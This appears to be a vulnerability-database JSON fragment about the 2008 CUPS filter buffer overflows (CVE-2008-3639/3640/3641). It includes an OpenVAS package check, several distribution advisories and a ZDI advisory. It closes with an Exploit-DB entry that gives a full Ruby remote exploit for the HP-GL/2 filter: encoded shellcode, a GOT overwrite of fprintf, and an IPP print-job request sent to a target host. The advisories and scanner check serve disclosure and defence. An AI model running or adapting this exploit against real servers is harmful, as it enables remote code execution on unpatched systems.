"id": "OPENVAS:880160", "href": "http://plugins.openvas.org/nasl.php?oid=880160", "type": "openvas", "title": "CentOS Update for cups CESA-2008:0937 centos3 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for cups CESA-2008:0937 centos3 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Common UNIX Printing System (CUPS) provides a portable printing layer\n for UNIX(R) operating systems.\n\n A buffer overflow flaw was discovered in the SGI image format decoding\n routines used by the CUPS image converting filter "imagetops". An attacker\n could create a malicious SGI image file that could, possibly, execute\n arbitrary code as the "lp" user if the file was printed. (CVE-2008-3639)\n \n An integer overflow flaw leading to a heap buffer overflow was discovered\n in the Text-to-PostScript "texttops" filter. An attacker could create a\n malicious text file that could, possibly, execute arbitrary code as the\n "lp" user if the file was printed. (CVE-2008-3640)\n \n An insufficient buffer bounds checking flaw was discovered in the\n HP-GL/2-to-PostScript "hpgltops" filter. An attacker could create a\n malicious HP-GL/2 file that could, possibly, execute arbitrary code as the\n "lp" user if the file was printed. (CVE-2008-3641)\n \n Red Hat would like to thank regenrecht for reporting these issues.\n \n All CUPS users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"cups on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015313.html\");\n script_id(880160);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0937\");\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_name( \"CentOS Update for cups CESA-2008:0937 centos3 x86_64\");\n\n script_summary(\"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.17~13.3.54\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.17~13.3.54\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.17~13.3.54\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-5286", "CVE-2008-3640"], "description": "### Background\n\nCUPS is the Common Unix Printing System. \n\n### Description\n\nSeveral buffer overflows were found in: \n\n * The read_rle16 function in imagetops (CVE-2008-3639, found by regenrecht, reported via ZDI) \n * The WriteProlog function in texttops (CVE-2008-3640, found by regenrecht, reported via ZDI) \n * The Hewlett-Packard Graphics Language (HPGL) filter (CVE-2008-3641, found by regenrecht, reported via iDefense) \n * The _cupsImageReadPNG function (CVE-2008-5286, reported by iljavs) \n\n### Impact\n\nA remote attacker could send specially crafted input to a vulnerable server, resulting in the remote execution of arbitrary code with the privileges of the user running the server. \n\n### Workaround\n\nNone this time. \n\n### Resolution\n\nAll CUPS users should upgrade to the latest version. \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-print/cups-1.3.9-r1\"", "edition": 1, "modified": "2008-12-10T00:00:00", "published": "2008-12-10T00:00:00", "id": "GLSA-200812-11", "href": "https://security.gentoo.org/glsa/200812-11", "type": "gentoo", "title": "CUPS: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:21:36", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-1722", "CVE-2008-3640"], "description": "It was discovered that the SGI image filter in CUPS did not perform \nproper bounds checking. If a user or automated system were tricked \ninto opening a crafted SGI image, an attacker could cause a denial \nof service. (CVE-2008-3639)\n\nIt was discovered that the texttops filter in CUPS did not properly \nvalidate page metrics. If a user or automated system were tricked into \nopening a crafted text file, an attacker could cause a denial of \nservice. (CVE-2008-3640)\n\nIt was discovered that the HP-GL filter in CUPS did not properly check \nfor invalid pen parameters. If a user or automated system were tricked \ninto opening a crafted HP-GL or HP-GL/2 file, a remote attacker could \ncause a denial of service or execute arbitrary code with user \nprivileges. In Ubuntu 7.10 and 8.04 LTS, attackers would be isolated by \nthe AppArmor CUPS profile. (CVE-2008-3641)\n\nNOTE: The previous update for CUPS on Ubuntu 6.06 LTS did not have the \nthe fix for CVE-2008-1722 applied. This update includes fixes for the \nproblem. We apologize for the inconvenience.", "edition": 5, "modified": "2008-10-15T00:00:00", "published": "2008-10-15T00:00:00", "id": "USN-656-1", "href": "https://ubuntu.com/security/notices/USN-656-1", "title": "CUPS vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1373", "CVE-2008-1722", "CVE-2008-3639", "CVE-2008-3640", "CVE-2008-3641"], "description": "The Common UNIX Printing System provides a portable printing layer for UNIX=C2=AE operating systems. It has been developed by Easy Software Produc ts to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. ", "modified": "2008-10-16T02:08:34", "published": "2008-10-16T02:08:34", "id": "FEDORA:E5CC020896E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: cups-1.3.9-1.fc9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1373", "CVE-2008-1722", "CVE-2008-3639", "CVE-2008-3640", "CVE-2008-3641", "CVE-2008-5183", "CVE-2008-5286"], "description": "The Common UNIX Printing System provides a portable printing layer for UNIX=C2=AE operating systems. It has been developed by Easy Software Produc ts to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. ", "modified": "2008-12-09T11:35:52", "published": "2008-12-09T11:35:52", "id": "FEDORA:7F2C2208D5A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: cups-1.3.9-2.fc9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4045", "CVE-2007-4352", "CVE-2007-5392", "CVE-2007-5393", "CVE-2008-0047", "CVE-2008-1373", "CVE-2008-1722", "CVE-2008-3639", "CVE-2008-3640", "CVE-2008-3641"], "description": "The Common UNIX Printing System provides a portable printing layer for UNIX=C2=AE operating systems. It has been developed by Easy Software Produc ts to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. ", "modified": "2008-10-16T02:03:57", "published": "2008-10-16T02:03:57", "id": "FEDORA:1CF1C208969", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: cups-1.3.9-1.fc8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4045", "CVE-2007-4352", "CVE-2007-5392", "CVE-2007-5393", "CVE-2008-0047", "CVE-2008-1373", "CVE-2008-1722", "CVE-2008-3639", "CVE-2008-3640", "CVE-2008-3641", "CVE-2008-5183", "CVE-2008-5286"], "description": "The Common UNIX Printing System provides a portable printing layer for UNIX=C2=AE operating systems. It has been developed by Easy Software Produc ts to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. ", "modified": "2008-12-09T11:38:29", "published": "2008-12-09T11:38:29", "id": "FEDORA:C698B2081FF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: cups-1.3.9-2.fc8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1373", "CVE-2008-1722", "CVE-2008-3639", "CVE-2008-3640", "CVE-2008-3641", "CVE-2008-5183", "CVE-2008-5286", "CVE-2009-0146", "CVE-2009-0147", "CVE-2009-0163", "CVE-2009-0164", "CVE-2009-0166"], "description": "The Common UNIX Printing System provides a portable printing layer for UNIX=C2=AE operating systems. It has been developed by Easy Software Produc ts to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. ", "modified": "2009-04-22T00:47:43", "published": "2009-04-22T00:47:43", "id": "FEDORA:5BE0C10F888", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: cups-1.3.10-1.fc9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:41:20", "bulletinFamily": "info", "cvelist": ["CVE-2008-3641"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple CUPS. Authentication is not required to exploit this vulnerability. The specific flaw exists in the Hewlett-Packard Graphics Language filter. Inadequate bounds checking on the pen width and pen color opcodes result in an arbitrary memory overwrite allowing for the execution of arbitrary code as the \"hgltops\" process uid.", "modified": "2008-06-22T00:00:00", "published": "2008-10-09T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-08-067/", "id": "ZDI-08-067", "title": "Apple CUPS HP-GL/2 Filter Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:31", "bulletinFamily": "software", "cvelist": ["CVE-2008-3641"], "description": "Buffer overflow in HP-GL/2 filter.", "edition": 1, "modified": "2008-10-12T00:00:00", "published": "2008-10-12T00:00:00", "id": "SECURITYVULNS:VULN:9351", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9351", "title": "Apple Mac OS X CUPS printing system code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:28", "bulletinFamily": "software", "cvelist": ["CVE-2008-3641"], "description": "ZDI-08-067: Apple CUPS 1.3.7 (HP-GL/2 filter) Remote Code Execution \r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-08-067\r\nOctober 9, 2008\r\n\r\n-- CVE ID:\r\nCVE-2008-3641\r\n\r\n-- Affected Vendors:\r\nApple\r\n\r\n-- Affected Products:\r\nApple OS X\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 6325. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Apple CUPS. Authentication is not required\r\nto exploit this vulnerability.\r\n\r\nThe specific flaw exists in the Hewlett-Packard Graphics Language\r\nfilter. Inadequate bounds checking on the pen width and pen color\r\nopcodes result in an arbitrary memory overwrite allowing for the\r\nexecution of arbitrary code as the "hgltops" process uid.\r\n\r\n-- Vendor Response:\r\nApple has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://support.apple.com/kb/HT3216\r\n\r\n-- Disclosure Timeline:\r\n2008-08-19 - Vulnerability reported to vendor\r\n2008-10-09 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * regenrecht\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nCONFIDENTIALITY NOTICE: This e-mail message, including any attachments,\r\nis being sent by 3Com for the sole use of the intended recipient(s) and\r\nmay contain confidential, proprietary and/or privileged information.\r\nAny unauthorized review, use, disclosure and/or distribution by any \r\nrecipient is prohibited. If you are not the intended recipient, please\r\ndelete and/or destroy all copies of this message regardless of form and\r\nany included attachments and notify 3Com immediately by contacting the\r\nsender via reply e-mail or forwarding to 3Com at postmaster@3com.com. ", "edition": 1, "modified": "2008-10-12T00:00:00", "published": "2008-10-12T00:00:00", "id": "SECURITYVULNS:DOC:20690", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20690", "title": "ZDI-08-067: Apple CUPS 1.3.7 (HP-GL/2 filter) Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T17:03:43", "description": "CUPS 1.3.7 'HP-GL/2' Filter Remote Code Execution Vulnerability. CVE-2008-3641. Remote exploit for linux platform", "published": "2008-10-09T00:00:00", "type": "exploitdb", "title": "CUPS <= 1.3.7 - 'HP-GL/2' Filter Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3641"], "modified": "2008-10-09T00:00:00", "id": "EDB-ID:32470", "href": "https://www.exploit-db.com/exploits/32470/", "sourceData": "source: http://www.securityfocus.com/bid/31688/info\r\n\r\nCUPS is prone to a remote code-execution vulnerability caused by an error in the 'HP-GL/2 filter.\r\n\r\nAttackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely cause a denial-of-service condition. Note that local users may also exploit this vulnerability to elevate privileges.\r\n\r\nSuccessful remote exploits may require printer sharing to be enabled on the vulnerable system.\r\n\r\nThe issue affects versions prior to CUPS 1.3.9.\r\n\r\nNOTE: This issue was previously discussed in BID 31681 (Apple Mac OS X 2008-007 Multiple Security Vulnerabilities), but has been assigned its own record to better document the vulnerability. \r\n\r\n#!/usr/bin/ruby -w\r\n\r\n# CUPS 1.3.7 (HP-GL/2 filter) remote code execution\r\n# gives uid=2(daemon) gid=7(lp) groups=7(lp)\r\n# linux 2.6.25/randomize_va_space = 1, glibc 2.7\r\n#\r\n# An Introduction to HP-GL/2 Graphics\r\n# http://www.tech-diy.com/HP%20Graphics%20Language.htm\r\n# Internet Printing Protocol/1.1: Encoding and Transport\r\n# http://tools.ietf.org/html/rfc2910\r\n# Internet Printing Protocol/1.1: Model and Semantics\r\n# http://tools.ietf.org/html/rfc2911\r\n\r\n# :::::::::::::::::::::::::::::::::: setup ::::::::::::::::::::::::::::::::::\r\n\r\nhost = '127.0.0.1'\r\nport = 631\r\nprinter = 'Virtual_Printer'\r\n\r\nPens_addr = 0x08073600\t\t# objdump -T hpgltops | grep Pens$\r\nfprintf_got = 0x080532cc\t# objdump -R hpgltops | grep fprintf\r\n\r\n# linux_ia32_exec - CMD=/bin/touch /tmp/yello Size=84, metasploit.com\r\n# encoder=PexFnstenvSub, restricted chars: 0xff\r\nshellcode =\r\n\t\"\\x2b\\xc9\\x83\\xe9\\xf1\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x7c\" +\r\n\t\"\\x48\\x22\\xd6\\x83\\xeb\\xfc\\xe2\\xf4\\x16\\x43\\x7a\\x4f\\x2e\\x2e\\x4a\\xfb\" +\r\n\t\"\\x1f\\xc1\\xc5\\xbe\\x53\\x3b\\x4a\\xd6\\x14\\x67\\x40\\xbf\\x12\\xc1\\xc1\\x84\" +\r\n\t\"\\x94\\x5e\\x22\\xd6\\x7c\\x67\\x40\\xbf\\x12\\x67\\x56\\xb9\\x09\\x2b\\x4a\\xf6\" +\r\n\t\"\\x53\\x3c\\x4f\\xa6\\x53\\x31\\x47\\xba\\x10\\x27\\x22\\x81\\x2f\\xc1\\xc3\\x1b\" +\r\n\t\"\\xfc\\x48\\x22\\xd6\";\r\n\r\n# :::::::::::::::::::::::::::::::::: code :::::::::::::::::::::::::::::::::::\r\n\r\n# beacause of hpgl-attr.c:68-73 and 269-274\r\ndef CR_setup()\r\n\t\"CR0,1,0,1,0,1;\"\r\nend\r\n\r\n# PS is a bit tricky here. final weight of pen (PW code) is calculated as:\r\n# weight*=hypot(ps[0],ps[1])/1016.0*72.0 (which is NOT hypot/73152.0),\r\n# where ps0=72.0*arg1/1016.0 and ps1=72.0*arg2/1016.0.\r\n# so, hoping to get things accurate I set multiplier to 1.0\r\ndef PS_setup()\r\n\t\"WU1;\" +\t\t# set the units used for pen widths\r\n\t\"RO0;\" +\t\t# (do not) rotate the plot\r\n\t\"PS0,199.123455;\";\t# set the plot size\r\nend\r\n\r\n# alternative approach to fight floating point rounding errors\r\n# first one seems to be more successful, though\r\ndef PS_setup_alt()\r\n\t\"WU0;\" +\r\n\t\"RO0;\";\r\nend\r\n\r\n# set the pen width (PS!)\r\ndef PW(width, pen)\r\n\t\"PW#{width},#{pen};\"\r\nend\r\n\r\ndef PW_alt(width, pen)\r\n\t\"PW#{width*25.4/72.0},#{pen};\"\r\nend\r\n\r\n# \"Set the pen color...\"\r\ndef PC(pen, r, g, b)\r\n\t\"PC#{pen},#{r},#{g},#{b};\"\r\nend\r\n\r\n# we'll be storing shellcode in Pens[1024] static buffer\r\n# typedef struct\r\n# {\r\n# float rgb[3]; /* Pen color */\r\n# float width; /* Pen width */\r\n# } pen_t;\r\ndef memcpy(data)\r\n\twhile (data.length % 16 != 0)\r\n\t\tdata += \"\\x90\";\r\n\tend\r\n\ts = ''\r\n\ta = 0, b = 0, i = 0\r\n\tdata.unpack('f*').each { |f|\r\n\t\tcase ((i += 1) % 4)\r\n\t\t\twhen 1: a = f\r\n\t\t\twhen 2: b = f\r\n\t\t\twhen 3: s += PC(i/4, a, b, f)\r\n\t\t\telse s += PW(f, (i-1)/4)\r\n\t\tend\r\n\t}\r\n\treturn s;\r\nend\r\n\r\n# overwrite all 16 bytes with the same value\r\ndef poke(addr, value)\r\n\tf = [value].pack('i').unpack('f')\t# floatyfication!\r\n\ti = (addr-Pens_addr)/16\r\n\treturn PC(i, f, f, f) + PW(f, i)\r\nend\r\n\r\nhpgl_data =\r\n\t\"BP;\" + # to be recognized by CUPS\r\n\tCR_setup() +\r\n\tPS_setup() +\r\n\tmemcpy(shellcode) +\r\n\tpoke(fprintf_got, Pens_addr) +\r\n\tPC(0, 0, 0, 0); # whatever\r\n\r\ndef attribute(tag, name, value)\r\n\t[tag].pack('C') +\r\n\t[name.length].pack('n') +\r\n\tname +\r\n\t[value.length].pack('n') +\r\n\tvalue\r\nend\r\n\r\n# tag - meaning (rfc2910#section-3.5)\r\n# 0x42 nameWithoutLanguage\r\n# 0x45 uri\r\n# 0x47 charset\r\n# 0x48 naturalLanguage\r\noperation_attr =\r\n\tattribute(0x47, 'attributes-charset', 'utf-8') +\r\n\tattribute(0x48, 'attributes-natural-language', 'en-us') +\r\n\tattribute(0x45, 'printer-uri', \"http://#{host}:#{port}/printers/#{printer}\") +\r\n\tattribute(0x42, 'job-name', 'zee greeteengz') +\r\n\tattribute(0x42, 'document-format', 'application/vnd.hp-HPGL');\r\n\r\nipp_data =\r\n\t\"\\x01\\x00\" +\t\t# version-number: 1.0\r\n\t\"\\x00\\x02\" +\t\t# operation-id: Print-job\r\n\t\"\\x00\\x00\\x00\\x01\" +\t# request-id: 1\r\n\t\"\\x01\" +\t\t# operation-attributes-tag\r\n\toperation_attr +\r\n\t\"\\x02\" +\t\t# job-attributes-tag\r\n\t\"\\x03\" +\t\t# end-of-attributes-tag\r\n\thpgl_data;\r\n\r\nhttp_request =\r\n\"\"\"POST /printers/#{printer} HTTP/1.1\r\nContent-Type: application/ipp\r\nUser-Agent: Internet Print Provider\r\nHost: #{host}\r\nContent-Length: #{ipp_data.length}\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\"\"\"\r\n\r\nrequire 'socket'\r\nNL = \"\\r\\n\"\r\n\r\nif (false)\r\n\t# ./hpgltops 0 none none 1 '' output.hpgl\r\n\tputs hpgl_data\r\n\tputs \"[+] dumping HP/GL-2 into output.hpgl\"\r\n\tf = File.new('output.hpgl', 'w')\r\n\tf.write(hpgl_data)\r\n\tf.close()\r\n\texit(0)\r\nend\r\n\r\nputs \"[+] connecting to #{host}:#{port}\"\r\ns = TCPSocket.open(host, port)\r\nputs \"[+] asking #{printer} for a printout\"\r\nhttp_request.each_line { |line|\r\n\ts.write(line.strip + NL)\r\n}\r\ns.write(NL)\r\ns.write(ipp_data)\r\ns.read(1)\r\ns.close()\r\nputs \"[+] done\"\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/32470/"}]}